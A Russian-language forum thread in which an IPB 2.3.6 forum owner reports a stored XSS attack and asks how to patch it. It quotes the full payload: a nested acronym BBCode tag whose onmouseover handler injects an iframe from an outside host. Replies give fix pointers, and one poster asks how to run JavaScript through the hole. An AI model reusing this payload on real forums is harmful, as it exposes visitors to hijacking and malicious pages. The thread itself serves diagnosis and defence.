![]() |
Пытаются ломануть через тег ipb
Есть форум ipb 2 3 6
один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код Код HTML:
[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]вот как работает тег акронима: Код:
[acronym='Laugh Out Loud']lol[/acronym] |
вот похоже
http://forum.antichat.ru/threadnav10119-1-10.html похожий способ взлома Напишите кто знает как это в ipb прикрыть |
добавь фильтрацию параметров - передаваемых в acronym
|
Мозг вещь хорошая но еще нужны знания, у меня их нет чтобы баг фиксануть
http://forums.ibresource.ru/index.php?showtopic=60138 Вон, как показывает практика уязвимы все двойки ipb, я думаю баг знающие люди найдут способ и к тройке применить |
Официальный фикс xss с акронимом в 2.3.6
Изменения sources/classes/bbcode/class_bbcode_core.php найти Код:
# XSS Check: Bug ID: 980Код:
# XSS acronym |
кто разобрался как ява скрипт через эту XSS произвести?
|
Цитата:
|
| Время: 21:21 |